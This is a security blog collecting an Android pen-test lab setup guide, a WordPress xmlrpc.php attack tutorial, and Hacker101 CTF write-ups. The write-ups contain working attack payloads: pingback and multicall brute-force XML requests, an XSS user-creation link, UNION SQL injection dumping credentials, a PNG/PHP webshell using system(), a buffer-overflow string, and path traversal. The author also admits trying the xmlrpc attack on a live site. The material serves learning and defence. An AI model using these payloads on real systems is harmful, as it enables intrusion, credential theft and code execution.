Bs&Derek

Steps to set-up Android Simulator for Pen-test

Hello everyone, today we will be learning how to setup an android simulator on your own computer. We will be constantly update this post if we have change anything or have modify our installation process.

Software we will be using is (for now):

Genymotion

Desktop Virtualization we are using is Virtual Box in Windows OS (You can also download Virtual Box in Linux distrubtion).

Step 1: Installation of Genymotion on your host. Here is the documentation if you need it.

First, create an account with Genymotion Desktop here.
After validating your account, go to the installation page.
At the installation page, you can choose the relevant packages to download for your OS version (Windows, Linux, Mac).
For Windows, there are 2 executable file you can download and install with just a few clicks.
1. The first executable file consist of both Genymotion Desktop application and Virtual box, if you have not install virtual box on your host, then the first executable file is more convenient to run it on your host to install both Genymotion and Virtual Box.
2. The other executable file only consist of Genymotion Desktop application for you to install if you already install Virtual Box on your host.
For Linux distribution,
1. You have to install virtual box and Genymotion Desktop application separately.
2. If you are using Linux distribution, I will assume you know how to install virtual box on your host machine. But if you don’t know, here is the link for steps to install virtual box in Linux distribution.
3. For Genymotion installation, you will get a binary file where you have to do a chmod command to run the binary file.

sudo chmod +x genymotion-3.0.4-vbox

Step 2: Running Genymotion on your host machine

In Windows, double click to run the application. For Linux distribution, go to the path where genymotion is installed and type “./genymotion” to start the application.
At the login, input your username and password.

Then Click ‘NEXT’.
You will reach the part where it will ask you for license key but you can just opt for “Personal Use”.
You will then jump to the EULA (End User License Agreement), just read through and accept the agreement.
Click ‘NEXT’, you will arrived at the main panel where you can choose the available templates.
\

We have finished install Genymotion on our host machine. The next part will be installing santoku in virtual box. Why use santoku linux OS? It is because it is used for mobile security pen-testing lab, you can also used Kali Linux. At this point, I will assume that you know how to setup a virtual machine in Virtual Box, thus I will not go through how to setup santoku in Virtual Box.

So, this is the end of the post. Hope you have a nice day.

Author: Bs & Derek.

Exploiting the xmlrpc.php

What is XML-RPC?

XML-RPC is an API that warps the information or data into XML file and sends it to the mobile app or remote software. This was introduced as in the olden days, internet speed is not fast, instead of writing it online. Users writes their content offline and publish all together using the API. As the internet services improved, most of us does not use the feature anymore, often it was forgotten by us.

xml_for

What are the vulnerabilities?

Brute force attack. The main reasons to perform the attack, is that this API does not have cap login attempts on the site. They may not get the correct credentials, but still causing problems like overloading the site. Availability of the site is affected.
Intercepting/stealing Login information. Lacking authentication system. Each time, the user try to access the website, the login credentials is sent within the XML form. If the connection is intercepted/ MITM, clear XML data is exposed.
XMLRPC pingback.ping. Attacker can use the method to retrieve the real public address of the WordPress site.

⚠️⚠️⚠️⚠️⚠️⚠️⚠️⚠️⚠️⚠️⚠️⚠️⚠️⚠️⚠️⚠️⚠️⚠️⚠️⚠️⚠️⚠️⚠️⚠️⚠️⚠️⚠️⚠️

Before I begin to show you the detail steps of carrying out following attacks. Any of your illegal action your have performed is on your own. I am not responsible for any of your actions. Please setup your own environment to do so or ask permission before doing.

⚠️⚠️⚠️⚠️⚠️⚠️⚠️⚠️⚠️⚠️⚠️⚠️⚠️⚠️⚠️⚠️⚠️⚠️⚠️⚠️⚠️⚠️⚠️⚠️⚠️⚠️⚠️⚠️

XMLRPC attack using Burpsuite

First check whether XMLRPC.php is accessible on the target site. In this case, I have setup a demo WordPress site to carry out the attack. [THIS DEMO SITE IS INSTALL & SETUP ON A VIRTUAL MACHINE]

checking

“XML-RPC server accepts POST requests only.”

Using GET method to retrieve the file, normally we will get this result.

Next, we will do a POST method to retrieve all the usable method in the XMLRPC server.

POST /xmlrpc.php/ HTTP/1.1
Host: 192.168.220.137
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-SG,en-US;q=0.9,en;q=0.8
Connection: close
Content-Length: 137

<?xml version="1.0" encoding="utf-8"?> 
<methodCall> 
<methodName>system.listMethods</methodName> 
<params></params> 
</methodCall>

methods

The server will reply you with a list of methods that can be used. In this case, we are particularly interested in pingback.ping method. One thing to take note that, all these data coming in and out uses XML format as explain above. So, make sure that the data format is correct.

To carry out the attack, we need to prepare these 2 things first

A valid webhook.site URL or any other alternative as you prefer like beeceptor and postbin
A valid URL of a targeted WordPress post.

<?xml version=”1.0″ encoding=”UTF-8″?>
<methodCall>
<methodName>pingback.ping</methodName>
<params>
<param>
<value><string>[webhook URL]</string></value>
</param>
<param>
<value><string>[Any blog post URL]</string></value>
</param>
</params>
</methodCall>

webhook

result

Below is an another example of this attack carry out on this WordPress site. YES! The one you are looking right now. Out of curiosity, I want to try out attacking the real site instead of the one I hosted. [THIS IS THE WEB ONLINE VERSION WORDPRESS]

own

As you can see, this attack is unsuccessful and no result will be shown in the postbin. It seems like they did some precaution and prevention of the online WordPress site. This method is useful for self setup site and did not disable xmlrpc.php

If you does not wish to use POSTBIN, open NC and set on listening mode works as well! 👍👍

nc2

Brute force attack using XMLRPC.php

As mention above, there is no limit of number tries. Getting successful username and password combination is just matter of time. And also, there are no mechanism like account lock out, after certain number of tries.

<?xml version="1.0"?>
<methodCall><methodName>system.multicall</methodName><params><param><value><array><data>

<value><struct><member><name>methodName</name><value><string>wp.getUsersBlogs</string></value></member><member><name>params</name><value><array><data><value><array><data><value><string>[username]</string></value><value><string>[password]</string></value></data></array></value></data></array></value></member></struct></value>

</data></array></value></param></params></methodCall>

To show the difference between successful and unsuccessful login, here is an example.

brute

And of course, you should be using Intruder to perform this kind of brute force attacks.

First, check the attack target, in my case I will be using IP address of my site.

target

we need to to set the Payload Positions and choosing ‘Cluster bomb’ in the Attack type list. Good resource to read up about positions and attack types [ https://portswigger.net/burp/documentation/desktop/tools/intruder/positions ]

postion

Here, we need to set 2 payload positions, ‘username’ and password. Next, we need to set the word list. This is documentation of Payload types [ https://portswigger.net/burp/documentation/desktop/tools/intruder/payloads/types ]

username password

Click ‘Start attack’ when you are ready

success

As we can observe, one of the Request has different length. And when we check the raw data under the response tab, show us this set of combination has successfully login.

Prevention

Install plugin for the lazy people [ https://wordpress.org/plugins/disable-xml-rpc/ ]
Disable xmlrpc.php using .htaccess

# Deny anyone to access the file
<Files xmlrpc.php>
order deny,allow
deny from all
</Files>

That’s it!! Thanks for take time to read this long post. See you next post ¯\_(ツ)_/¯

cat

7/Jan/2020 — > Just a small Add-On

Me and my partner write this script for fun. change the variable if need, we did not do user input optimization

https://drive.google.com/open?id=1AyNGfBF5YvvGQdF3Di762H5NIkXOyoGT

Hacker101 – H1 Thermostat

Hi guys hope you are having a nice day.

This CTF we will be doing is an android apk, thus we have to decompile it to analyze the source code.

Overview:

H1 Thermostat
Level: Easy
Total Flags: 2

After de-compiling the apk, first look at the AndroidManifest.xml,
android_xml
this xml file will tell you what packages and where the main is. xml_source

Here we know the source code is in “com/hacker101/level11” directory.
file_explorer

First we take a look at main code which is “ThermostatActivity.java”, and there was nothing much apparently, the only that caught my eye was it importing the “ThermostatModel.java”.

Next we will take a look at “ThermostatModel.java” and there was no sign of Flags but again it imports another java file from the same subfolder which is “PayloadRequest.java”.

Now, looking at the source code of “PayloadRequest.java”, we discover there was 2 FLAGS in one of the code blocks and the FLAGS we discovered are for FLAG 0 & 1.

I was like damm that was fast, so here is a picture of both flags.
flags

That’s all folks, see ya 🙂

Author: Derek

Hacker101 – Ticketastic

Onto another CTF in Hacker101, Ticketastic:Live Instance.

I will go straight to the point, so after playing around with the demo instances, I found out the website is vulnerable XSS attack while submitting as XSS script via the ‘Submit a Ticket’ page. And since, the hint given to us is “This level and the Ticketastic demo instance are running the same code”.

It means that both live and demo instances are the same in terms of functionality, which means the live instances is also vulnerable to XSS attack.

Going to live instances, we tried to login as admin like how we did in demo instances but it gives us an invalid password, so it means that we have to create a user within the web application without being the ‘admin’ to get into the web page.

Here is where we exploit the XSS vulnerability in this web application by submitting a XSS script in the ‘Submit a Ticket’ page, hoping that script will run when someone click on it or the page load and execute the script.

If you have create new user in the demo instances, you would realized that the page ‘newUser’ using GET method to create new user for the web application, you will be able to see the parameter used to create the user. Thus, we can make use of it in our script to add new user when the page is loaded.

Here is the script that I have created.

<a onload="http://localhost/newUser?username=user1&password=user1&password2=user1">

How it should look like in the submit ticket page
xss_attack

Go to the login page, and enter the username and password
admin_login
You will be able to see a link referring to the FLAG.
pending_flag

Click on the link and it will direct us to page where the flag is.
FLAG 0
flag0

Moving on to the next FLAG…

We have discover another vulnerability in the web application which is SQL injection in the ‘ticket’ page.
sqli_vuln Knowing that in order for us to get the next FLAG, we need to login as ‘admin’ which is mostly likely the case here. Another thing to note, is that the column is 3 due to the face that the first query is 3 column, so subsequent query have to query for 3 columns as well.

I tried to enumerate out the database first, using the following query

0 union select version(), database(), null --

The result is…
database

It confirmed that it is not a blind SQL injection and that the database will return the intend result back to us.

Lets enumerate out the table in the database

0 union select group_concat(table_name),null,null from information_schema.tables where table_schema=database() --

The result is…
table

Knowing the first table is “tickets” where it store all the user’s submission, we can confirmed that the other table ”users” is where the username and password is stored. Now, is to find out the column name of table ‘users’.

0 union select null,group_concat(column_name),null from information_schema.columns where table_name='users' --

The result is…
columns

Finally, we can find out the password of the admin.

0 union select username, password, null from users --

To our surprised, the second flag was actually the password for the admin account.

FLAG 1

And we have come to end of the post. Thank you for reading and feel free to leave a comment.

Author: Derek

Hacker101 – Intentional Exercise

Hi guys, a brand new day means a brand new CTF for us to do 🙂

For today, we will looking through the Android APK. Same as ‘Hello World!’ CTF, in order to know how the application worked, we have to decompile it and look through the source code.

I decompile the android apk, unzip and get a bunch of folders and AndroidManifest.xml, and the first hint given to me was “check the manifest”.

I open up the AndroidManifest.xml and the source code…

The package name is “com.hacker.101.level13”, and there is one line of code where the main is…

Going back to the file explorer
file_explorer

The folder ‘sources’ should be able to tell you that’s where the source code are, click onto the ‘sources’ folder, in there are additional folder, ‘android’, ‘androidx’ and ‘com’.

Remember the main code is at ‘com.hacker101.level13.MainActivity’, it can be represent as ‘sources/com/hacker101/level13/MainActivity’ where the source code is at.

Under the ‘level13’ folder, there are 3 java files…
java_files

The ‘MainActivity.java’ is the one, we want to look at. So here is the source code…

package com.hacker101.level13;

import android.net.Uri;
import android.os.Bundle;
import android.support.v7.app.AppCompatActivity;
import android.webkit.WebView;
import android.webkit.WebViewClient;
import java.math.BigInteger;
import java.nio.charset.StandardCharsets;
import java.security.MessageDigest;
import java.security.NoSuchAlgorithmException;

public class MainActivity extends AppCompatActivity {
    /* access modifiers changed from: protected */
    public void onCreate(Bundle bundle) {
        super.onCreate(bundle);
        setContentView((int) R.layout.activity_main);
        WebView webView = (WebView) findViewById(R.id.webview);
        webView.setWebViewClient(new WebViewClient());
        Uri data = getIntent().getData();
        String str = "http://34.94.3.143/e6474d3ac4/appRoot";
        String str2 = BuildConfig.FLAVOR;
        if (data != null) {
            str2 = data.toString().substring(28);
            StringBuilder sb = new StringBuilder();
            sb.append(str);
            sb.append(str2);
            str = sb.toString();
        }
        if (!str.contains("?")) {
            StringBuilder sb2 = new StringBuilder();
            sb2.append(str);
            sb2.append("?");
            str = sb2.toString();
        }
        try {
            MessageDigest instance = MessageDigest.getInstance("SHA-256");
            instance.update("s00p3rs3cr3tk3y".getBytes(StandardCharsets.UTF_8));
            instance.update(str2.getBytes(StandardCharsets.UTF_8));
            String format = String.format("%064x", new Object[]{new BigInteger(1, instance.digest())});
            StringBuilder sb3 = new StringBuilder();
            sb3.append(str);
            sb3.append("&hash=");
            sb3.append(format);
            webView.loadUrl(sb3.toString());
        } catch (NoSuchAlgorithmException e) {
            e.printStackTrace();
        }
    }
}

By looking at the source code, we can identify that the variable ‘str’ contains a URL value “http://34.94.3.143/e6474d3ac4/appRoot”. Input the URL value into the search bar and where the web page has return me a link to the ‘Flag’.
appRoot

Once I clicked onto the link to the ‘Flag’, I get an ‘invalid request’ message,
invalid
so since I stop in my tracks again, time to look at the source code for more clues.

Looking at the next few lines of code:

String str = "http://34.94.3.143/e6474d3ac4/appRoot";
        String str2 = BuildConfig.FLAVOR;
        if (data != null) {
            str2 = data.toString().substring(28);
            StringBuilder sb = new StringBuilder();
            sb.append(str);
            sb.append(str2);
            str = sb.toString();
        }
        if (!str.contains("?")) {
            StringBuilder sb2 = new StringBuilder();
            sb2.append(str);
            sb2.append("?");
            str = sb2.toString();
        }

Knowing the value of ‘str’, we have to look at the variable ‘str2’. This variable ‘str2’, I can assume that the value is “/flagBearer”, why? First, I insert ‘/’ after ‘appRoot’ in the URL and I get the error message ‘Not Found’. Secondly, the new variable ‘str’ is made of the old variable ‘str’, ‘str2’ and ‘?’.

By looking at the previous URL “http://34.94.3.143/e6474d3ac4/appRoot/flagBearer” that gives an error message “Invalid request”, I added “?” after the URL. The result, I still get the error message “Invalid request” instead of “Not Found”.

Thus, this prove that the variable ‘str2’, its value is “/flagBearer”

Hence, the whole URL string is…

String str = "http://34.94.3.143/e6474d3ac4/appRoot/flagBearer?"

We can conclude that:

the old variable ‘str’ has a URL value ‘http://34.94.3.143/e6474d3ac4/appRoot’
there is another variable ‘str2’ has a value “/flagBearer”
And the new variable ‘str’ is ‘http://34.94.3.143/e6474d3ac4/appRoot/flagBearer?’

Now let’s take a look at the last block of code:

try {
            MessageDigest instance = MessageDigest.getInstance("SHA-256");
            instance.update("s00p3rs3cr3tk3y".getBytes(StandardCharsets.UTF_8));
            instance.update(str2.getBytes(StandardCharsets.UTF_8));
            String format = String.format("%064x", new Object[]{new BigInteger(1, instance.digest())});
            StringBuilder sb3 = new StringBuilder();
            sb3.append(str);
            sb3.append("&hash=");
            sb3.append(format);
            webView.loadUrl(sb3.toString());
        } catch (NoSuchAlgorithmException e) {
            e.printStackTrace();
        }

This block of code, it has a secret key ‘s00p3rs3cr3tk3y’ which is put through SHA-256 hashing algorithm to produce a string of hash value. So, basically the web application needs to check for the hash value in order for the flag to be shown.

But before the secret key is put through the hashing algorithm, there is another string value being append to the secret key. And the value belongs to the variable ‘str2’.

Now we know that the secret key plus the value of ‘str2’ is “s00p3rs3cr3tk3y/flagBearer”. The following code is where the variable ‘format’ is used to store the hash string.

String format = String.format("%064x", new Object[]{new BigInteger(1, instance.digest())});

Afterwards, the next four line of code is very important as it tells us the whole URL string that can give us the ‘FLAG’ value.

sb3.append(str);
sb3.append("&hash=");
sb3.append(format);
webView.loadUrl(sb3.toString());

The variable ‘sb3’ is a string builder where is append the new variable ‘str’.

sb3 = "http://34.94.3.143/e6474d3ac4/appRoot/flagBearer?"

Then, it append the string “&hash=”

sb3 = "http://34.94.3.143/e6474d3ac4/appRoot/flagBearer?&hash="

Finally, it appends the value of the variable format. So, knowing that the string is ‘s00p3rs3cr3tk3y/flagBearer’, I put it through the SHA-256 hashing algorithm to produce the hash value which is “8743a18df6861ced0b7d472b34278dc29abba81b3fa4cf836013426d6256bd5e”

So at the end the URL should look like this:

sb3 = "http://34.94.3.143/e6474d3ac4/appRoot/flagBearer?&hash=8743a18df6861ced0b7d472b34278dc29abba81b3fa4cf836013426d6256bd5e"

Take the URL and load it. It will give us the flag we needed.

Alright that all folks, hope you have fun solving the flag. Have a nice day 🙂

Author: Derek

Hacker101 – TempImage

I will be doing TempImage CTF on Hacker101 today, enjoy.

Hints given:

File uploads can be hard to pin down
What happens to your filename when you see an uploaded file?
What if you make a small change to the path?

index

As usual check the source page first. Just mess around with the site to collect as much information as you can.

source

source1

error

So, here we were given the ability to upload only PNG image. And strange string is added before our filename.

high

Let’s try to access the ‘files’ directory.

for

Hmm…So, Let’s look at the hints. The third hints is telling us try to change the path a bit. Let’s capture the traffic and see what can we do.

proxy

Notice this at the end of the traffic. The PNG file gonna be displayed as we saw, and the filename

bef

What is Content-Disposition https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Disposition

What if we make a little change to it, maybe add extra path?

after

flag0

That is our first flag! 😋😋

As we can observer that original file path should be

-> files/0391bdcddadeb18297f5a8c7adc23ab4_wall.PNG

but after making change in Burpsuite

-> files/0391bdcddadeb18297f5a8c7adc23ab4_../wall.PNG

We actually change where the PNG should be saved in to server.

Flag 1: Found

Disclaimer: Once again, I am unable to solve the flag completely on my own. I have read up lots of other people’s write-ups to understand the process of solving. Still I will demonstrate my way of doing. https://github.com/testerting/hacker101-ctf/tree/master/tempimage/flag1

Hints given:

It clearly wants one specific format
If you can’t bypass that check, what can you do?
Read up on PNG chunks

These are the 3 files we need to help us solving Flag 1. 👨🏻‍💻👨🏻‍💻

<copy.bat>
copy wall.png/b + command.php new.png

<command.php>
<?php system("ls"); ?>

<wall.png>

In command.php, instead of uploading the webshell as that guy did in his walk-through. I want to do something simple like RCE.

Executing copy.bat, will produce new.png

combine

All good? Let’s upload the PNG into the server and capture the traffic using Burpsuite

high2

Allow me to explain why you need to change the extension of the ‘new.png’ to ‘new.php’. As the hint given, this upload only allows PNG to be uploaded. But changing the extension does not affected us to get Flag0. It means that server does not check on file extension instead they check on the file header to determine whether the file is PNG or not. The second reason is that if we don’t put the PHP extension, our malicious command in PHP tag will not be executed.

Click the redirection button will bring us into the next page.

As we can see the ‘ls’ command has successfully executed. Now, we just need to change the command to help us find the flag.

Change the command in Burpsuite

<?php system("cat index.php | grep FLAG"); ?>

change

flag1

Here you go, that is your Flag 1. 🚩🚩

There are other ways to solve this as well, like changing the PNG chunks and input the commands or something. I am unable to do that, cause I don’t really understand PNG chunks. 😂😂😂😂

Thanks for reading, see you in the next post. (☞ﾟヮﾟ)☞ ☜(ﾟヮﾟ☜)

Hacker101 – “Hello World!”

Hi guys!!! Happy 2020 to you all. Hope you have a new year resolution to solve CTF ahahahah (just joking).

Today, we will be doing Hacker101 CTF “Hello World!”.

So based on the website, there is a input box ‘STDIN’ and a link to download a vulnerable binary program.

The first hint given for this CTF is “What does the application do?”.

I play around with the input box by inserting special characters, and random word. The web application will print out the exact word or special character being inserted into the input box.

What’s next? I went to download the binary program called ‘vulnerable’, I went to execute it but nothing happen. So I know that I have to debug the binary program.

But first I need to find out the details of the vulnerable binary program.

Here are some of the information that I have found:

# file vulnerable
vulnerable: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=ea1000564e33f4ad1901ebfe81bfc1fb3ea38fa2, not stripped

# readelf -h vulnerable
ELF Header:
  Magic:   7f 45 4c 46 02 01 01 00 00 00 00 00 00 00 00 00 
  Class:                             ELF64
  Data:                              2's complement, little endian
  Version:                           1 (current)
  OS/ABI:                            UNIX - System V
  ABI Version:                       0
  Type:                              EXEC (Executable file)
  Machine:                           Advanced Micro Devices X86-64
  Version:                           0x1
  Entry point address:               0x4005b0
  Start of program headers:          64 (bytes into file)
  Start of section headers:          6808 (bytes into file)
  Flags:                             0x0
  Size of this header:               64 (bytes)
  Size of program headers:           56 (bytes)
  Number of program headers:         9
  Size of section headers:           64 (bytes)
  Number of section headers:         30
  Section header string table index: 29

Based on the information given above, I find out that the program is in ELF executable file. ELF stands for Executable and Linkable Format also known as Extensible Linking Format. It is a common file format for executable files, object code, shared libraries and core dumps.

From here I went ahead to use ‘strings’ – to print out a sequence of printable characters in the program.

# strings vulnerable
/lib64/ld-linux-x86-64.so.2
libc.so.6
exit
puts
stdin
printf
fgetc
memset
getenv
__libc_start_main
__gmon_start__
GLIBC_2.2.5
UH-X
AWAVA
AUATL
[]A\A]A^A_
FLAGS
What is your name?
Hello %s!
;*3$"

Based on the printable characters of the program, I can identify that ‘FLAGS’ where the flag will be print in the web application. Now we have to debug/reverse engineer the program called ‘vulnerable’.

I went to search up on reverse engineering on ELF executable file, it explain the reason why gdb tool is unable to read the symbols in the file and how to do basic reverse engineering for ELF 64-bit LSB executable file.

Moving on…

In the above code block, the command ‘readelf -h vulnerable’ gives us the entrypoint of the executable file. The entry-point is ‘0x4005b0’ which is the starting memory address for the executable file.

Time to debug the program…

I do ‘gdb vulnerable’ to gain a debugging session shell.

Do note that the file is 64-bit thus, once you disassemble main or x command it, you will see ‘rdp’, ‘rsp’ etc.

Afterwards, I do ‘x/200i 0x4005b0’
content_of_mem

Basically, what I did was to display memory contents instruction of 200 elements at the address.

Hit the enter button a few times and discover that there is a function called ‘print_flags’.

The memory address to print out the flag in the web application is ‘0x4006ee’, the full address is ‘0x00000000004006ee’. Keep in the mind the memory address of ‘print_flags’.

Looking through the contents, I figured out that the fget() in the program accepts the stdin of the user which it will go to the main function where printf() will print out the input of the user.

Seeing fget() and printf(), I finally understood that I need to do a buffer overflow attack on the program to point the return address to the memory address of ‘print_flags’ to print out the flag.

Before exploiting the buffer, I need to find out the buffer of the program. So, I type in ‘disassemble main’ to find out the buffer.
buffer
‘$0x20’ is a hexdecimal value, converted to decimal the buffer is 32 bytes.

The stack = buffer[32] + rbp(8) + return address(8) = 48, why add 8 bytes for rbp and return address? Is because the program is 64-bit instead of 32-bit thus the memory address between each other is 8 bytes.

For the memory address of ‘print_flags’ to become the return address, I need to have the remaining 40 bytes to be overflow with ‘A’, in hex. is ‘\x41’.

In the web application, instead of inputting the characters and memory address in the form to submit, I input it in the URL bar using URL encoding format as if I use ascii character in the input box, I wouldn’t be able to input in the memory address of ‘print_flags’ as the hexdecimal value is a non-ascii character when it is converted.

In the URL bar is it should look like this:

/?stdin=%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%ee%06%40%00%00%00%00%00

I hit the enter button and I was able to get the flag.
flags

What I learned? To learn how to reverse engineer the program and analyse its content to be able to figured out that it is vulnerable to buffer overflow attack and the main objective is to have the return address point to the memory address of the function called ‘print_flags’ to output the flag in the web application.

That’s all folks 🙂

Author: Derek

Hacker101 – BugDB v3

We have now arrived at the last version of BugDB, version 3. At this post/stage, if you are reading it, you should have a bit of understanding how the queries worked, and explore the schema in the GraphiQL client browser.

Leggo!!!! BugDBv3!!!!

The given hint is “What new functionality was added?”. This brought me to look at the documentation in GraphiQL client browser. Under the object type ‘mutation’, there are 2 field type ‘attachFile’ and ‘modifyAttachement’.
mut_fields
This are the new functions being added to the client browser.

I queried the object type ‘allUsers’ to identify what are the results I will received.
queried
And the result was…
q_result1 q_result2

It shows me that the subfield ‘attachments’ is blank, giving me the hint that I will have to do mutation in order to see the flag in ‘attachments’.
mut_attached

However once, I attach the file and query again, all I see was the unique filename.
find_admin

Once I reach this point and I went see for more hints.

The hints are:

What new functionality was added?
Filenames are always interesting
How do you access attachments? Hint: not via GraphQL

Based on the last hint, I figured out that ‘attachments’ can be a folder, so what I add ‘/attachments/’ in the URL. I got the error message ‘Not Found’, so I was thinking that since ‘attachments’ in just a folder, there should be files in it.

I tried pasting the filename in the URL but I still get an error message then I tried to input the id attached to the filename and it worked. I can conclude that the filename is bind to the ‘id’ in the field ‘attachFile’.
attachments

After that I was stuck here and I was totally clueless, due to my lack of knowledge and skills, I went to search online and found 2 useful resources that help me understand this CTF.

There are the 2 links:

I really was stuck and I can’t move on, so the summary of the resources I found, that I can do a directory traversal and go to the filename called ‘main.py’

Based on the resources, I used the other mutation available which is ‘modifyAttachment’ to change the filename to “../main.py”.
modify

I went to “/attachments/1” and it returns me a web page, I went to view source code and here are the line of codes.
main_py

Afterwards, I watched the youtube video and the guy in the discord chat said that not all the import files are python packages, some of them are source codes, and the one that stood out is ‘model’.

I went to modify the filename to “../model.py”
model_py

The result returns to me a page full of codes and I went to view source code..
model_code

In model.py it imports the db_session and here in the source code, in line 7 the ‘engine’ variable is bind to the db_session.

It shows ‘level18.db’, it means that we have to open up the level18.db where the flag is at.

I went to modify the filename to ‘../level18.db’ and reload the web page. And the flag is there.
flag3

DAMMM, I really struggle a lot but thanks to the resources, the youtube video and github, I was able to solve it. Really so thankful right now.

Alright that’s all folk.

Author: Derek

Hacker101 – BugDB v2

Alright let’s get starting with BugDBv2, similar to the first BugDBv1, it is on GraphiQL.

So for this BugDBv2, there is additional ‘Root’ type called ‘mutation’. You can find it under the tab button called ‘Docs’.
explore_mut
Click on ‘MyMutattions’ and it will show you a field structure.
modified_fields

I searched up, what is ‘Mutation’ in GraphiQL, and this it what it tells me “Mutation queries modify data in the data store and returns a value. It can be used to insert, update, or delete data. Mutations are defined as a part of the schema.“

So the field type under ‘MyMutation’ is a modified data field type. A this point, this is all I know of, but I was a bit clueless so I went to get hint and the first hint given to me was “What has changed since last version?”.

What has changed? In the previous BugDBv1, I was able to query the subfield type called ‘bug’ where its subfield type called ‘text’ was able to give me the flag. So I queried the same thing for this BugDBv2 and I got an error message which is…
error

Since I can’t query the field type “bug”, it means that the flag is in there. I went to query the object type ‘allBugs’ but I found nothing.
admin_bug
I was thinking that why is it only the ‘admin’ bug shown and not ‘victim’ bug. I thought it was the field ‘private’ that prevent ‘victim’ bug to be shown so I went to change it using ‘Mutation’ to modify data in the database.

Taking a look again at the field ‘modfiyBug’
modified_fields
I have to change the field ‘private’ value to ‘false’ for ‘victim’. Note ‘victim’ field ‘id’ is ‘2’
mutation_victim
The rest of the fields, like I told you in the previous post can leave it to the GraphiQL client interfaces where it will list down the suggested field type for us.

And now I input the same query for object type ‘allBugs’.
allBugs
The result return to us have the flag in the subfield type ‘text’ of ‘victim’
flag2

Yayy we finally solve BugDBv2. Thank you for reading it and feel free to leave a comment behind.

Author Derek

Hacker101 – Cody’s first blog

Today, I will be doing Cody’s First Blog from Hacker101. This challenge is on Moderate level and has 3 Flags to be discovered.

Flag 0: Found

home_cody

As the information given, we know that the blog is written in PHP and PHP function include() is some what useful for us. Then, we have this comment box to submit comments.

So, the first thing I do after seeing input box is XSS injection

<script>alert('1')</script>

Upon submitting, the input seems went through but no alert pop-up

submit

Conclude that, maybe XSS scripting does not work here. Since the blog is using PHP, why not try to put some PHP tags to see it works or not.

<?php phpinfo()?>

cody_f0

That was easy! 😉😉👨🏼‍💻

Flag 1: Found

underline_cody

View the page source, we can see that line 19 is commented out. Seems like we can access the admin page through that URL ending.

admin_cody

What if we change the URL to this, will anything interesting happen?

?page=a

un_cody

As we can see that ‘a’ is used as a filename. So, for the first case ‘admin.auth.inc’ the include function should look like this [What is file inclusion? https://www.w3schools.com/php/php_includes.asp]

include(admin.auth.inc.php)

Therefore, we are able to conclude this. There are 3 files available which are ‘admin’, ‘auth’ & ‘inc’. Basically, the developer thought of having all 3 files and include them to save time and energy. Have you ever played jigsaw puzzle before? 🤗🤗 That is exactly what I gonna do.

?page=admin
?page=auth
?page=inc
?page=admin.auth
?page=admin.inc
?page=auth.inc

With ‘admin.inc’ page, we have successful got into the admin page without authenticate ourselves.

cody_f1

It seems like ‘auth’ page handles the authentication of the admin. After we remove the ‘auth’ page, we can bypass the authentication easily. Not easy but cool! 🤩🤩👨🏼‍💻

Flag 2: Found

Disclaimer: Due to my lack of knowledge and skills, I can’t complete the flag on my own. I try to put in my understanding into this.

https://github.com/testerting/hacker101-ctf/tree/master/codys_first_blog/flag2

Hint given:

Read the first blog post carefully
We talk about this in the Hacker101 File Inclusion Bugs video
Where can you access your own stored data?
Include doesn’t just work for filenames

Back to the error in Flag 1, we missed out some important information

id_cody

error

Memory error encounter, memory is overloaded.

Change the way of approach, what if we input URL instead of ‘filename’ to avoid overload the memory

include(index.php)
include(http://localhost/index)

For those who wonder why putting URL in include() function works https://www.php.net/manual/en/function.include.php

?page=http://localhost/index

idk

The scripts we put during Flag 0 is triggered!! 👨‍💻👨‍💻

Let’s try out a bit more

<?php echo 'happy new year';?>

We can roughly conclude that we can run anything as long as enclose it inside the PHP tag. Since we know those, instead of access the file through URL. Why not print out the file instead.

<?php echo readfile("index.php")?>

After approving it in admin page, look at the ‘index’ page again

1502

“1502” is added!? Maybe we should go check out the source page.

cody_f2

Found the last flag in the source code. 🏳️‍🌈🏳️‍🌈

Anyways, Happy new year!!! 🎉🎉Wish you find more bugs in new year 🦗🐜